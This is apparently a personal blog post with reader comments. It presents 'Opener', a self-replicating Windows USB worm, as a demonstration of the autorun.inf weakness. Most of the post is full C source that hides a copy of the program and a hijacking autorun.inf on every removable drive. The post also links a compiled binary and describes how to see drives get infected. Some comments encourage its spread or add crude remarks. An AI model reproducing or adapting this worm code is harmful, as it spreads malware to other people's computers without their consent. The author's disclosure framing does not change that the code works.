|
|
Opener: A USB Flash Drive VirusFor a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but it's also a security risk. Pretty-much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk.. and you can always rely on Microsoft to make the potential an actual. Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove should it? Fair enough, here's some code:
#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"
HANDLE hmutex = NULL;
void closing()
{
if (hmutex)
ReleaseMutex(hmutex);
}
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
UNREFERENCED_PARAMETER(hPrevInstance);
UNREFERENCED_PARAMETER(lpCmdLine);
WCHAR myfile[1024];
GetModuleFileName(NULL, myfile, 1024);
if (myfile[1] != L':')
return 1;
WCHAR cmd[1024];
wsprintf(cmd, L"explorer %c:\\", myfile[0]);
STARTUPINFOW si;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION po;
memset(&po, 0, sizeof(po));
CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po);
hmutex = CreateMutex(NULL, TRUE, L"Opener");
if (hmutex == INVALID_HANDLE_VALUE)
return 1;
if (GetLastError() == ERROR_ALREADY_EXISTS) {
CloseHandle(hmutex);
return 1;
}
atexit(closing);
HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hmyfile == NULL)
return 1;
DWORD szhigh = 0;
DWORD szlow = GetFileSize(hmyfile, &szhigh);
if (szhigh != 0) {
CloseHandle(hmyfile);
return 1;
}
void *myfilemem = malloc(szhigh * 65536 + szlow);
DWORD nread;
ReadFile(hmyfile, myfilemem, szlow, &nread, NULL);
CloseHandle(hmyfile);
while(1) {
DWORD mask = GetLogicalDrives();
for (int i = 0; i < 26; i++)
if (mask & (1 << i)) {
WCHAR path[100];
path[0] = L'A' + i;
path[1] = L':';
path[2] = L'\\';
path[3] = 0;
DWORD type = GetDriveType(path);
if (type == DRIVE_REMOVABLE) {
DWORD spc, bps, nfc, tnc;
if (GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc)) {
if (nfc < tnc) {
wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
if (GetFileAttributes(path) == INVALID_FILE_ATTRIBUTES) {
HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
if (h != INVALID_HANDLE_VALUE) {
DWORD written;
WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
CloseHandle(h);
wsprintf(path, L"%c:\\opener.exe", L'A' + i);
h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
if (h != INVALID_HANDLE_VALUE) {
WriteFile(h, myfilemem, szlow, &written, NULL);
CloseHandle(h);
} else {
wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
DeleteFile(path);
}
}
}
}
}
}
}
Sleep(1000 * 60);
}
return 0;
}
download: opener.cpp and here's it compiled: opener.exe.
How does it work?It's really quite simple:
So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected. Remove the drive, and use Task Manager to kill opener.exe, and now plug the drive back in. If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change - it won't pop up now. You may have had this experience before.. it's kinda random when Windows will and wont pop up that box. No matter, go to My Computer as you typically would and double click on the drive that has been found.. as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again. And so the cycle continues. Dear Microsoft, please fix, thanks. QuantumG << back to my home page Locke says: Yet another glaring hole in Microsoft's logic which will most definitely be answered by a statement that the user should only ever be using Microsoft approved hardware and software that has never been touched since they approved it and shrink-wrapped it. So, if you aren't using their stuff and you get a virus, your warranty is void, and no soup for you. Locke says: I've posted about this on my blog and linked and credited you. Let me know what you think of my site if you get a chance. Thanks, Locke Linux says: Linux Linux says: Disregard that, I suck cocks. Linus says: I'm not sure who thinks he's funnier linux or the guy posting as linux... Impotence says: This would spread through a college or university like wildfire, half of the people i know at college have a flash drive with them at all times and are copying things onto over peoples flash drives for them (Study notes etc) MatthewT says: Amazing concept, more people need to know of this. This guy thinks you should just disable autorun, but a link is all he says: http://features.engadget.com/2004/06/29/how-to-tuesday-disable-autorun-on-windows/ Patrick says: http://wiki.hak5.org/wiki//USB_Hacksaw Bill says: Autorun should be disabled by default, like hiding filename suffixes. Leo. says: Stop criticize Windows. For the people who don't care/understand about this, Windows will remain the best option. For who that understand this... well, we already know that windows is shit. Par[A]doX says: Oh my god! This is the worst thing that can ever happen in the history of things happening! Nevermind the fact that this, Hacksaw, and USBDumper are all easily detected by most antivirus software on the market as being malicious and therefore incapable of being downloaded, let alone executed. WhatIsQDOS? says: Nevermind that anyone who understands the code above can alter and recompile it, voiding antivirus signature detection. Nevermind that any single point of failure in 3rd party "bulletproof vest" security products gives the attacker full ownership of a target machine running any Microsoft operating system. Nevermind that millions of botnet zombie computers, all of them with Microsoft operating systems, are dutifully downloading their antivirus updates every day, in between spraying spam across the world and participating in DDOS attacks. Imposter says: Oh, windows. When will you learn? Embryonic says: Ubuntu =P Luke says: Ubuntu rocks, I agree with Embryonic :D paperbeatsrock says: www.fatchicksinpartyhats.com would destroy that virus... and all of mankind! |